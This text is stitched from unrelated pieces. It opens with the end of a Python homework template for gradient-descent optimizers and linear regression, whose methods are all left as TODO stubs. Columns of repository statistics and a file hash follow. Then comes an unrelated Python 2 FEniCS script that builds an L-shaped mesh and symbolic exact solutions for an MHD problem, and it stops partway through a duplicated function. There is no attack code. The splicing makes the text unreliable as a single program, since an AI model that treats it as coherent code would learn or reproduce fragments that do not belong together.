"""
# TODO: implement calculating gradient function
raise NotImplementedError('StochasticDescent calc_gradient function not implemented')
class MomentumDescent(BaseDescent):
"""
Momentum gradient descent class
"""
def __init__(self, w0: np.ndarray, lambda_: float, alpha: float = alpha_default, s0: float = s0_default,
p: float = p_default):
"""
:param w0: weight initialization
:param lambda_: learning rate parameter (float)
:param alpha: momentum coefficient
:param s0: learning rate parameter (float)
:param p: learning rate parameter (float)
"""
super().__init__()
self.eta = lambda k: lambda_ * (s0 / (s0 + k)) ** p
self.alpha = alpha
self.w = np.copy(w0)
self.h = 0
def update_weights(self, gradient: np.ndarray, iteration: int) -> np.ndarray:
"""
Changing weights with respect to gradient
:param iteration: iteration number
:param gradient: gradient estimate
:return: weight difference: np.ndarray
"""
# TODO: implement updating weights function
raise NotImplementedError('MomentumDescent update_weights function not implemented')
def calc_gradient(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
"""
Getting objects, calculating gradient at point w
:param X: objects' features
:param y: objects' targets
:return: gradient: np.ndarray
"""
# TODO: implement calculating gradient function
raise NotImplementedError('MomentumDescent calc_gradient function not implemented')
class Adagrad(BaseDescent):
"""
Adaptive gradient algorithm class
"""
def __init__(self, w0: np.ndarray, lambda_: float, eps: float = eps_default, s0: float = s0_default,
p: float = p_default):
"""
:param w0: weight initialization
:param lambda_: learning rate parameter (float)
:param eps: smoothing term (float)
:param s0: learning rate parameter (float)
:param p: learning rate parameter (float)
"""
super().__init__()
self.eta = lambda k: lambda_ * (s0 / (s0 + k)) ** p
self.eps = eps
self.w = np.copy(w0)
self.g = 0
def update_weights(self, gradient: np.ndarray, iteration: int) -> np.ndarray:
"""
Changing weights with respect to gradient
:param iteration: iteration number
:param gradient: gradient estimate
:return: weight difference: np.ndarray
"""
# TODO: implement updating weights function
raise NotImplementedError('Adagrad update_weights function not implemented')
def calc_gradient(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
"""
Getting objects, calculating gradient at point w
:param X: objects' features
:param y: objects' targets
:return: gradient: np.ndarray
"""
# TODO: implement calculating gradient function
raise NotImplementedError('Adagrad calc_gradient function not implemented')
class GradientDescentReg(GradientDescent):
"""
Full gradient descent with regularization class
"""
def __init__(self, w0: np.ndarray, lambda_: float, mu: float = mu_default, s0: float = s0_default,
p: float = p_default):
"""
:param mu: l2 coefficient
"""
super().__init__(w0=w0, lambda_=lambda_, s0=s0, p=p)
self.mu = mu
def update_weights(self, gradient: np.ndarray, iteration: int) -> np.ndarray:
return super().update_weights(gradient, iteration)
def calc_gradient(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
l2 = None # TODO
return super().calc_gradient(X, y) + l2 * self.mu
class StochasticDescentReg(StochasticDescent):
"""
Stochastic gradient descent with regularization class
"""
def __init__(self, w0: np.ndarray, lambda_: float, mu: float = mu_default, s0: float = s0_default,
p: float = p_default, batch_size: int = batch_size_default):
"""
:param mu: l2 coefficient
"""
super().__init__(w0=w0, lambda_=lambda_, s0=s0, p=p, batch_size=batch_size)
self.mu = mu
def update_weights(self, gradient: np.ndarray, iteration: int) -> np.ndarray:
return super().update_weights(gradient, iteration)
def calc_gradient(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
l2 = None # TODO
return super().calc_gradient(X, y) + l2 * self.mu
class MomentumDescentReg(MomentumDescent):
"""
Momentum gradient descent with regularization class
"""
def __init__(self, w0: np.ndarray, lambda_: float, alpha: float = alpha_default, mu: float = mu_default,
s0: float = s0_default, p: float = p_default):
"""
:param mu: l2 coefficient
"""
super().__init__(w0=w0, lambda_=lambda_, alpha=alpha, s0=s0, p=p)
self.mu = mu
def update_weights(self, gradient: np.ndarray, iteration: int) -> np.ndarray:
return super().update_weights(gradient, iteration)
def calc_gradient(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
l2 = None # TODO
return super().calc_gradient(X, y) + l2 * self.mu
class AdagradReg(Adagrad):
"""
Adaptive gradient algorithm with regularization class
"""
def __init__(self, w0: np.ndarray, lambda_: float, eps: float = eps_default, mu: float = mu_default,
s0: float = s0_default, p: float = p_default):
"""
:param mu: l2 coefficient
"""
super().__init__(w0=w0, lambda_=lambda_, eps=eps, s0=s0, p=p)
self.mu = mu
def update_weights(self, gradient: np.ndarray, iteration: int) -> np.ndarray:
return super().update_weights(gradient, iteration)
def calc_gradient(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
l2 = None # TODO
return super().calc_gradient(X, y) + l2 * self.mu
class LinearRegression:
"""
Linear regression class
"""
def __init__(self, descent, tolerance: float = tolerance_default, max_iter: int = max_iter_default):
"""
:param descent: Descent class
:param tolerance: float stopping criterion for square of euclidean norm of weight difference
:param max_iter: int stopping criterion for iterations
"""
self.descent = descent
self.tolerance = tolerance
self.max_iter = max_iter
self.loss_history = []
def fit(self, X: np.ndarray, y: np.ndarray) -> LinearRegression:
"""
Getting objects, fitting descent weights
:param X: objects' features
:param y: objects' target
:return: self
"""
# TODO: fit weights to X and y
raise NotImplementedError('LinearRegression fit function not implemented')
def predict(self, X: np.ndarray) -> np.ndarray:
"""
Getting objects, predicting targets
:param X: objects' features
:return: predicted targets
"""
# TODO: calculate prediction for X
raise NotImplementedError('LinearRegression predict function not implemented')
def calc_loss(self, X: np.ndarray, y: np.ndarray) -> None:
"""
Getting objects, calculating loss
:param X: objects' features
:param y: objects' target
"""
# TODO: calculate loss and save it to loss_history
raise NotImplementedError('LinearRegression calc_loss function not implemented')
###########################################################
####################### BONUS TASK ########################
###########################################################
class StochasticAverageGradient(BaseDescent):
"""
Stochastic average gradient class (BONUS TASK)
"""
def __init__(self, w0: np.ndarray, lambda_: float, x_shape: int, s0: float = s0_default, p: float = p_default):
"""
:param w0: weight initialization
:param lambda_: learning rate parameter (float)
:param s0: learning rate parameter (float)
:param p: learning rate parameter (float)
"""
super().__init__()
self.eta = lambda k: lambda_ * (s0 / (s0 + k)) ** p
self.w = np.copy(w0)
self.v = np.zeros((x_shape, w0.shape[0]))
self.d = 0
def update_weights(self, gradient: np.ndarray, iteration: int) -> np.ndarray:
"""
Changing weights with respect to gradient
:param iteration: iteration number
:param gradient: gradient
:return: weight difference: np.ndarray
"""
# TODO: implement updating weights function
raise NotImplementedError('GradientDescent update_weights function not implemented')
def calc_gradient(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
"""
Getting objects, calculating gradient at point w
:param X: objects' features
:param y: objects' targets
:return: gradient: np.ndarray
"""
# TODO: implement calculating gradient function
raise NotImplementedError('GradientDescent calc_gradient function not implemented')
###########################################################
####################### BONUS TASK ########################
###########################################################
| 34.578005
| 115
| 0.610651
| 1,505
| 13,520
| 5.344186
| 0.093023
| 0.089519
| 0.033818
| 0.048489
| 0.77869
| 0.761407
| 0.734925
| 0.725973
| 0.711923
| 0.70608
| 0
| 0.010298
| 0.267382
| 13,520
| 390
| 116
| 34.666667
| 0.801716
| 0.321967
| 0
| 0.507937
| 0
| 0
| 0.09016
| 0
| 0
| 0
| 0
| 0.04359
| 0
| 1
| 0.277778
| false
| 0.015873
| 0.015873
| 0.031746
| 0.452381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ea219a7c8958eb882b83c3631f8f4dfbe2baf560
| 38,558
|
py
|
Python
|
MHD/FEniCS/MHD/Stabilised/SaddlePointForm/Test/SplitMatrix/ScottTest/Lshaped/Laplacian/Lshaped.py
|
wathen/PhD
|
35524f40028541a4d611d8c78574e4cf9ddc3278
|
[
"MIT"
] | 3
|
2020-10-25T13:30:20.000Z
|
2021-08-10T21:27:30.000Z
|
MHD/FEniCS/MHD/Stabilised/SaddlePointForm/Test/SplitMatrix/ScottTest/Lshaped/Laplacian/Lshaped.py
|
wathen/PhD
|
35524f40028541a4d611d8c78574e4cf9ddc3278
|
[
"MIT"
] | null | null | null |
MHD/FEniCS/MHD/Stabilised/SaddlePointForm/Test/SplitMatrix/ScottTest/Lshaped/Laplacian/Lshaped.py
|
wathen/PhD
|
35524f40028541a4d611d8c78574e4cf9ddc3278
|
[
"MIT"
] | 3
|
2019-10-28T16:12:13.000Z
|
2020-01-13T13:59:44.000Z
|
import petsc4py
import sys
petsc4py.init(sys.argv)
from petsc4py import PETSc
import mshr
from dolfin import *
import sympy as sy
import numpy as np
import ExactSol
import MatrixOperations as MO
import CheckPetsc4py as CP
def Domain(n):
# defining the L-shaped domain
# domain = mshr.Rectangle(Point(-1., -1.), Point(1., 1.)) - mshr.Rectangle(Point(0., -1.), Point(1., 0.) )
# mesh = mshr.generate_mesh(domain, n)
mesh = RectangleMesh(-1,-1,1,1,n,n, 'crossed')
cell_f = CellFunction('size_t', mesh, 0)
for cell in cells(mesh):
v = cell.get_vertex_coordinates()
y = v[np.arange(0,6,2)]
x = v[np.arange(1,6,2)]
xone = np.ones(3)
xone[x > 0] = 0
yone = np.ones(3)
yone[y < 0] = 0
if np.sum(xone)+ np.sum(yone)>5.5:
cell_f[cell] = 1
mesh = SubMesh(mesh, cell_f, 0)
# cell_markers = CellFunction("bool", mesh)
# cell_markers.set_all(False)
# origin = Point(0., 0.)
# for cell in cells(mesh):
# p = cell.midpoint()
# if abs(p.distance(origin)) < 0.6:
# cell_markers[cell] = True
# mesh = refine(mesh, cell_markers)
# cell_markers = CellFunction("bool", mesh)
# cell_markers.set_all(False)
# origin = Point(0., 0.)
# for cell in cells(mesh):
# p = cell.midpoint()
# if abs(p.distance(origin)) < 0.4:
# cell_markers[cell] = True
# mesh = refine(mesh, cell_markers)
# cell_markers = CellFunction("bool", mesh)
# cell_markers.set_all(False)
# origin = Point(0., 0.)
# for cell in cells(mesh):
# p = cell.midpoint()
# if abs(p.distance(origin)) < 0.2:
# cell_markers[cell] = True
# mesh = refine(mesh, cell_markers)
# Creating classes that define the boundary of the domain
class Left(SubDomain):
def inside(self, x, on_boundary):
return near(x[0], -1.0)
class Right(SubDomain):
def inside(self, x, on_boundary):
return near(x[0], 1.0)
class Bottom(SubDomain):
def inside(self, x, on_boundary):
return near(x[1], -1.0)
class Top(SubDomain):
def inside(self, x, on_boundary):
return near(x[1], 1.0)
class CornerTop(SubDomain):
def inside(self, x, on_boundary):
return near(x[1], 0.0)
class CornerLeft(SubDomain):
def inside(self, x, on_boundary):
return near(x[0], 0.0)
left = Left()
top = Top()
right = Right()
bottom = Bottom()
cleft = CornerLeft()
ctop = CornerTop()
# Initialize mesh function for the domain
domains = CellFunction("size_t", mesh)
domains.set_all(0)
# Initialize mesh function for boundary domains
boundaries = FacetFunction("size_t", mesh)
boundaries.set_all(0)
left.mark(boundaries, 1)
top.mark(boundaries, 1)
bottom.mark(boundaries, 1)
cleft.mark(boundaries, 1)
ctop.mark(boundaries, 1)
right.mark(boundaries, 2)
return mesh, boundaries, domains
# functions that perform partial derivatives of x and y with respect to polar coordinates
def polarx(u, rho, phi):
return sy.cos(phi)*sy.diff(u, rho) - (1./rho)*sy.sin(phi)*sy.diff(u, phi)
def polary(u, rho, phi):
return sy.sin(phi)*sy.diff(u, rho) + (1./rho)*sy.cos(phi)*sy.diff(u, phi)
def Solution(mesh, params):
l = 0.54448373678246
omega = (3./2)*np.pi
phi = sy.symbols('x[1]')
rho = sy.symbols('x[0]')
z = sy.symbols('z')
# looked at all the exact solutions and they seems to be the same as the paper.....
psi = (sy.sin((1+l)*phi)*sy.cos(l*omega))/(1+l) - sy.cos((1+l)*phi) - (sy.sin((1-l)*phi)*sy.cos(l*omega))/(1-l) + sy.cos((1-l)*phi)
psi_prime = sy.diff(psi, phi)
psi_3prime = sy.diff(psi, phi, phi, phi)
u = rho**l*((1+l)*sy.sin(phi)*psi + sy.cos(phi)*psi_prime)
v = rho**l*(-(1+l)*sy.cos(phi)*psi + sy.sin(phi)*psi_prime)
uu0 = Expression((sy.ccode(u),sy.ccode(v)))
p = -rho**(l-1)*((1+l)**2*psi_prime + psi_3prime)/(1-l)
pu0 = Expression(sy.ccode(p))
f = rho**(2./3)*sy.sin((2./3)*phi)
# b = sy.diff(f,rho)#
b = polarx(f, rho, phi)
# d = (1./rho)*sy.diff(f,phi)#
d = polary(f, rho, phi)
bu0 = Expression((sy.ccode(b),sy.ccode(d)))
r = sy.diff(phi,rho)
ru0 = Expression(sy.ccode(r))
# Defining polarx and polary as the x and y derivatives with respect to polar coordinates (rho, phi). Writing the right handside with respect to cartesian coords
#Laplacian
L1 = polarx(polarx(u, rho, phi), rho, phi) + polary(polary(u, rho, phi), rho, phi)
L2 = polarx(polarx(v, rho, phi), rho, phi) + polary(polary(v, rho, phi), rho, phi)
# Advection
A1 = u*polarx(u, rho, phi)+v*polary(u, rho, phi)
A2 = u*polarx(v, rho, phi)+v*polary(v, rho, phi)
# Pressure gradient
P1 = polarx(p, rho, phi)
P2 = polary(p, rho, phi)
# Curl-curl
C1 = polarx(polary(d, rho, phi), rho, phi) - polary(polary(b, rho, phi), rho, phi)
C2 = polarx(polary(b, rho, phi), rho, phi) - polary(polary(d, rho, phi), rho, phi)
# Multiplier gradient
R1 = sy.diff(r, rho)
R2 = sy.diff(r, rho)
# Coupling term for fluid variables
NS1 = -d*(polarx(d, rho, phi)-polary(b, rho, phi))
NS2 = b*(polarx(d, rho, phi)-polary(b, rho, phi))
# Coupling term for Magnetic variables
M1 = polary(u*d-v*b, rho, phi)
M2 = -polarx(u*d-v*b, rho, phi)
# Using https://en.wikipedia.org/wiki/Del_in_cylindrical_and_spherical_coordinates defintitions of the derivative operators (sy.diff(u,rho) means partial derivative of u with respect to rho)
# Laplacian
L11 = (1./rho)*sy.diff(rho*sy.diff(u,rho),rho) + (1./(rho**2))*sy.diff(sy.diff(u,phi),phi) - (1./rho**2)*u - (2./rho**2)*sy.diff(v, phi)
L22 = (1./rho)*sy.diff(rho*sy.diff(v,rho),rho) + (1./(rho**2))*sy.diff(sy.diff(v,phi),phi) - (1./rho**2)*v + (2./rho**2)*sy.diff(u, phi)
# Advection
A11 = u*sy.diff(u, rho) + (1./rho)*v*sy.diff(u, phi) - u**2/rho
A22 = u*sy.diff(v, rho) + (1./rho)*v*sy.diff(v, phi) + v*u/rho
# Pressure gradient
P11 = sy.diff(p, rho)
P22 = (1./rho)*sy.diff(p, phi)
# Curl-curl
c = (1./rho)*(sy.diff(rho*d, rho) - sy.diff(b, phi))
C11 = (1./rho)*sy.diff(c, phi)
C22 = -sy.diff(c, rho)
# Multiplier gradient
R11 = sy.diff(r, rho)
R22 = sy.diff(r, rho)
# Coupling term for fluid variables
NS11 = -c*d
NS22 = c*b
# Coupling term for Magnetic variables
c = u*d-v*b
M11 = (1./rho)*sy.diff(c, phi)
M22 = -sy.diff(c, rho)
FF = sy.diff(u, rho) + (1./rho)*sy.diff(v, phi)
# print "\n\n\nL limits \n\n"
# print sy.limit(L1, rho,0), sy.limit(sy.limit(L1, phi,0),rho,0)
# print sy.limit(L11, rho,0), sy.limit(sy.limit(L11, phi,0),rho,0)
# print "\n", sy.limit(L2, rho,0), sy.limit(sy.limit(L2, phi,0),rho,0)
# print sy.limit(L22, rho,0), sy.limit(sy.limit(L22, phi,0),rho,0)
# print "\n\n\nA limits \n\n"
# print sy.limit(A1, rho,0), sy.limit(sy.limit(A1, phi,0),rho,0)
# print sy.limit(A11, rho,0), sy.limit(sy.limit(A11, phi,0),rho,0)
# print "\n", sy.limit(A2, rho,0), sy.limit(sy.limit(A2, phi,0),rho,0)
# print sy.limit(A22, rho,0), sy.limit(sy.limit(A22, phi,0),rho,0)
# print "\n\n\nP limits \n\n"
# print sy.limit(P1, rho,0), sy.limit(sy.limit(P1, phi,0),rho,0)
# print sy.limit(P11, rho,0), sy.limit(sy.limit(P11, phi,0),rho,0)
# print "\n", sy.limit(P2, rho,0), sy.limit(sy.limit(P2, phi,0),rho,0)
# print sy.limit(P22, rho,0), sy.limit(sy.limit(P22, phi,0),rho,0)
# print "\n\n\nC limits \n\n"
# print sy.limit(C1, rho,0), sy.limit(sy.limit(C1, phi,0),rho,0)
# print sy.limit(C11, rho,0), sy.limit(sy.limit(C11, phi,0),rho,0)
# print "\n", sy.limit(C2, rho,0), sy.limit(sy.limit(C2, phi,0),rho,0)
# print sy.limit(C22, rho,0), sy.limit(sy.limit(C22, phi,0),rho,0)
# print "\n\n\nR limits \n\n"
# print sy.limit(R1, rho,0), sy.limit(sy.limit(R1, phi,0),rho,0)
# print sy.limit(R11, rho,0), sy.limit(sy.limit(R11, phi,0),rho,0)
# print "\n", sy.limit(R2, rho,0), sy.limit(sy.limit(R2, phi,0),rho,0)
# print sy.limit(R22, rho,0), sy.limit(sy.limit(R22, phi,0),rho,0)
# print "N\n\n\nS limits \n\n"
# print sy.limit(NS1, rho,0), sy.limit(sy.limit(NS1, phi,0),rho,0)
# print sy.limit(NS11, rho,0), sy.limit(sy.limit(NS11, phi,0),rho,0)
# print "\n", sy.limit(NS2, rho,0), sy.limit(sy.limit(NS2, phi,0),rho,0)
# print sy.limit(NS22, rho,0), sy.limit(sy.limit(NS22, phi,0),rho,0)
# print "\n\n\nM limits \n\n"
# print sy.limit(M1, rho,0), sy.limit(sy.limit(M1, phi,0),rho,0)
# print sy.limit(M11, rho,0), sy.limit(sy.limit(M11, phi,0),rho,0)
# print "\n", sy.limit(M2, rho,0), sy.limit(sy.limit(M2, phi,0),rho,0)
# print sy.limit(M22, rho,0), sy.limit(sy.limit(M22, phi,0),rho,0)
# print "\n\n\Fluid limits \n\n"
# print sy.limit(u, rho,0), sy.limit(sy.limit(u, phi,0),rho,0)
# print sy.limit(v, rho,0), sy.limit(sy.limit(v, phi,0),rho,0)
# print sy.limit(p, rho,0), sy.limit(sy.limit(p, phi,0),rho,0)
# print "\n\n\nVelocity limits \n\n"
# print sy.limit(b, rho,0), sy.limit(sy.limit(b, phi,0),rho,0)
# print sy.limit(d, rho,0), sy.limit(sy.limit(d, phi,0),rho,0)
# print sy.limit(r, rho,0), sy.limit(sy.limit(r, phi,0),rho,0)
# ssss
# graduu0 = Expression(sy.ccode(sy.diff(u, rho) + (1./rho)*sy.diff(u, phi)))
graduu0 = Expression((sy.ccode(sy.diff(u, rho)),sy.ccode(sy.diff(v, rho))))
Laplacian = Expression((sy.ccode(L11),sy.ccode(L22)))
Advection = Expression((sy.ccode(A11),sy.ccode(A22)))
gradPres = Expression((sy.ccode(P11),sy.ccode(P22)))
CurlCurl = Expression((sy.ccode(C11),sy.ccode(C22)))
gradR = Expression((sy.ccode(R11).replace('M_PI','pi'),sy.ccode(R22).replace('M_PI','pi')))
NS_Couple = Expression((sy.ccode(NS11),sy.ccode(NS22)))
M_Couple = Expression((sy.ccode(M11),sy.ccode(M22)))
# ignore this! Just removes the singularity (atan2(0,0) = NaN) and makes all functions zero at the origin
class u0(Expression):
def __init__(self, mesh, uu0):
self.mesh = mesh
self.u0 = uu0
def eval_cell(self, values, x, ufc_cell):
# if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
# values[0] = 0.0
# values[1] = 0.0
# else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
# print theta
if theta < 0:
theta += 2*np.pi
values[0] = self.u0(r, theta)[0]
values[1] = self.u0(r,theta)[1]
def value_shape(self):
return (2,)
class gradu0(Expression):
def __init__(self, mesh, graduu0):
self.mesh = mesh
self.gradu0 = graduu0
def eval_cell(self, values, x, ufc_cell):
# if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
# values = 0.0
# else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
values = self.gradu0(r,theta)
class p0(Expression):
def __init__(self, mesh, pu0):
self.mesh = mesh
self.p0 = pu0
def eval_cell(self, values, x, ufc_cell):
# if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
# values[0] = 0.0
# else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
values[0] = self.p0(r,theta)
def eval(self, values, x):
# if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
# values = 0.0
# else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
values[0] = self.p0(r,theta)
class p0Vec(Expression):
def __init__(self, mesh, pu0):
self.mesh = mesh
self.p0 = pu0
def eval_cell(self, values, x, ufc_cell):
# if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
# values[0] = 0.0
# else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
values[0] = self.p0(r,theta)
values[1] = self.p0(r,theta)
def eval(self, values, x):
# if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
# values = 0.0
# else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
values[0] = self.p0(r,theta)
values[1] = self.p0(r,theta)
# def value_shape(self):
# return (1,)
class b0(Expression):
def __init__(self, mesh, bu0):
self.mesh = mesh
self.b0 = bu0
def eval_cell(self, values, x, ufc_cell):
# if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
# values[0] = 0.0
# values[1] = 0.0
# else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
values[0] = self.b0(r, theta)[0]
values[1] = self.b0(r,theta)[1]
# print values
def value_shape(self):
return (2,)
class r0(Expression):
def __init__(self, mesh, element=None):
self.mesh = mesh
def eval(self, values, x):
values[0] = 1.0
# def value_shape(self):
# return ( )
class F_NS(Expression):
def __init__(self, mesh, Laplacian, Advection, gradPres, NS_Couple, params):
self.mesh = mesh
self.Laplacian = Laplacian
self.Advection = Advection
self.gradPres = gradPres
self.NS_Couple = NS_Couple
self.params = params
def eval_cell(self, values, x, ufc_cell):
if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
values[0] = 0.0
values[1] = 0.0
else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
values[0] = self.Advection(r,theta)[0] - self.params[0]*self.NS_Couple(r,theta)[0]
values[1] = self.Advection(r,theta)[1] - self.params[0]*self.NS_Couple(r,theta)[1]
# ssss
# print values
def value_shape(self):
return (2,)
class F_S(Expression):
def __init__(self, mesh, Laplacian, gradPres, params):
self.mesh = mesh
self.Laplacian = Laplacian
self.gradPres = gradPres
self.params = params
def eval_cell(self, values, x, ufc_cell):
values[0] = 0
values[1] = 0
# print r, theta, self.Laplacian(r,theta)
def value_shape(self):
return (2,)
# params[1]*params[0]*CurlCurl+gradR -params[0]*M_Couple
class F_M(Expression):
def __init__(self, mesh, CurlCurl, gradR ,M_Couple, params):
self.mesh = mesh
self.CurlCurl = CurlCurl
self.gradR = gradR
self.M_Couple = M_Couple
self.params = params
def eval_cell(self, values, x, ufc_cell):
if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
values[0] = 0.0
values[1] = 0.0
else:
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
values[0] = - self.params[0]*self.M_Couple(r,theta)[0]
values[1] = - self.params[0]*self.M_Couple(r,theta)[1]
def value_shape(self):
return (2,)
class F_MX(Expression):
def __init__(self, mesh):
self.mesh = mesh
def eval_cell(self, values, x, ufc_cell):
values[0] = 0.0
values[1] = 0.0
def value_shape(self):
return (2,)
class Neumann(Expression):
def __init__(self, mesh, pu0, graduu0, params, n):
self.mesh = mesh
self.p0 = pu0
self.gradu0 = graduu0
self.params = params
self.n = n
def eval_cell(self, values, x, ufc_cell):
if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
values[0] = 2.0
values[1] = 0.0
else:
# print x[0], x[1]
r = sqrt(x[0]**2 + x[1]**2)
theta = np.arctan2(x[1],x[0])
if theta < 0:
theta += 2*np.pi
# cell = Cell(self.mesh, ufc_cell.index)
# print ufc_cell
# n = cell.normal(ufc_cell.local_facet)
# n = FacetNormal(self.mesh)
# print self.n
# sss
values[0] = (self.p0(r,theta) - self.params[0]*self.gradu0(r,theta)[0])
# print -(self.p0(r,theta) - self.params[0]*self.gradu0(r,theta))
values[1] = -(self.params[0]*self.gradu0(r,theta)[1])
def value_shape(self):
return (2,)
# class NeumannGrad(Expression):
# def __init__(self, mesh, pu0, graduu0, params, n):
# self.mesh = mesh
# self.p0 = pu0
# self.gradu0 = graduu0
# self.params = params
# self.n = n
# def eval_cell(self, values, x, ufc_cell):
# if abs(x[0]) < 1e-8 and abs(x[1]) < 1e-8:
# values[0] = 2.0
# values[1] = 0.0
# else:
# # print x[0], x[1]
# r = sqrt(x[0]**2 + x[1]**2)
# theta = np.arctan2(x[1],x[0])
# if theta < 0:
# theta += 2*np.pi
# # cell = Cell(self.mesh, ufc_cell.index)
# # print ufc_cell
# # n = cell.normal(ufc_cell.local_facet)
# # n = FacetNormal(self.mesh)
# # print self.n
# # sss
# values[0] = -(self.p0(r,theta) - self.params[0]*self.gradu0(r,theta)[0])
# # print -(self.p0(r,theta) - self.params[0]*self.gradu0(r,theta))
# values[1] = (self.params[0]*self.gradu0(r,theta)[1])
# def value_shape(self):
# return (2,)
u0 = u0(mesh, uu0)
p0 = p0(mesh, pu0)
p0vec = p0Vec(mesh, pu0)
b0 = b0(mesh, bu0)
r0 = r0(mesh)
F_NS = F_NS(mesh, Laplacian, Advection, gradPres, NS_Couple, params)
F_M = F_M(mesh, CurlCurl, gradR, M_Couple, params)
F_MX = F_MX(mesh)
F_S = F_S(mesh, Laplacian, gradPres, params)
gradu0 = gradu0(mesh, graduu0)
Neumann = Neumann(mesh, pu0, graduu0, params, FacetNormal(mesh))
# NeumannGrad = NeumannGrad(mesh, p0, graduu0, params, FacetNormal(mesh))
return u0, p0, b0, r0, F_NS, F_M, F_MX, F_S, gradu0, Neumann, p0vec
def Solution2(mesh, params):
l = 0.54448373678246
omega = (3./2)*np.pi
phi = sy.symbols('x[1]')
rho = sy.symbols('x[0]')
z = sy.symbols('z')
# looked at all the exact solutions and they seems to be the same as the paper.....
psi = (sy.sin((1+l)*phi)*sy.cos(l*omega))/(1+l) - sy.cos((1+l)*phi) - (sy.sin((1-l)*phi)*sy.cos(l*omega))/(1-l) + sy.cos((1-l)*phi)
psi_prime = sy.diff(psi, phi)
psi_3prime = sy.diff(psi, phi, phi, phi)
u = rho**l*((1+l)*sy.sin(phi)*psi + sy.cos(phi)*psi_prime)
v = rho**l*(-(1+l)*sy.cos(phi)*psi + sy.sin(phi)*psi_prime)
uu0 = Expression((sy.ccode(u),sy.ccode(v)))
p = -rho**(l-1)*((1+l)**2*psi_prime + psi_3prime)/(1-l)
pu0 = Expression(sy.ccode(p))
f = rho**(2./3)*sy.sin((2./3)*phi)
# b = sy.diff(f,rho)#
b = polarx(f, rho, phi)
# d = (1./rho)*sy.diff(f,phi)#
d = polary(f, rho, phi)
bu0 = Expression((sy.ccode(b),sy.ccode(d)))
r = sy.diff(phi,rho)
ru0 = Expression(sy.ccode(r))
# Defining polarx and polary as the x and y derivatives with respect to polar coordinates (rho, phi). Writing the right handside with respect to cartesian coords
#Laplacian
L1 = polarx(polarx(u, rho, phi), rho, phi) + polary(polary(u, rho, phi), rho, phi)
L2 = polarx(polarx(v, rho, phi), rho, phi) + polary(polary(v, rho, phi), rho, phi)
# Advection
A1 = u*polarx(u, rho, phi)+v*polary(u, rho, phi)
A2 = u*polarx(v, rho, phi)+v*polary(v, rho, phi)
# Pressure gradient
P1 = polarx(p, rho, phi)
P2 = polary(p, rho, phi)
# Curl-curl
C1 = polarx(polary(d, rho, phi), rho, phi) - polary(polary(b, rho, phi), rho, phi)
C2 = polarx(polary(b, rho, phi), rho, phi) - polary(polary(d, rho, phi), rho, phi)
# Multiplier gradient
R1 = sy.diff(r, rho)
R2 = sy.diff(r, rho)
# Coupling term for fluid variables
NS1 = -d*(polarx(d, rho, phi)-polary(b, rho, phi))
NS2 = b*(polarx(d, rho, phi)-polary(b, rho, phi))
# Coupling term for Magnetic variables
M1 = polary(u*d-v*b, rho, phi)
M2 = -polarx(u*d-v*b, rho, phi)
# Using https://en.wikipedia.org/wiki/Del_in_cylindrical_and_spherical_coordinates defintitions of the derivative operators (sy.diff(u,rho) means partial derivative of u with respect to rho)
# Laplacian
L11 = (1./rho)*sy.diff(rho*sy.diff(u,rho),rho) + (1./(rho**2))*sy.diff(sy.diff(u,phi),phi) - (1./rho**2)*u - (2./rho**2)*sy.diff(v, phi)
L22 = (1./rho)*sy.diff(rho*sy.diff(v,rho),rho) + (1./(rho**2))*sy.diff(sy.diff(v,phi),phi) - (1./rho**2)*v + (2./rho**2)*sy.diff(u, phi)
# Advection
A11 = u*sy.diff(u, rho) + (1./rho)*v*sy.diff(u, phi) - u**2/rho
A22 = u*sy.diff(v, rho) + (1./rho)*v*sy.diff(v, phi) + v*u/rho
# Pressure gradient
P11 = sy.diff(p, rho)
P22 = (1./rho)*sy.diff(p, phi)
# Curl-curl
c = (1./rho)*(sy.diff(rho*d, rho) - sy.diff(b, phi))
C11 = (1./rho)*sy.diff(c, phi)
C22 = -sy.diff(c, rho)
# Multiplier gradient
R11 = sy.diff(r, rho)
R22 = sy.diff(r, rho)
# Coupling term for fluid variables
NS11 = -c*d
NS22 = c*b
# Coupling term for Magnetic variables
c = u*d-v*b
M11 = (1./rho)*sy.diff(c, phi)
M22 = -sy.diff(c, rho)
FF = sy.diff(u, rho) + (1./rho)*sy.diff(v, phi)
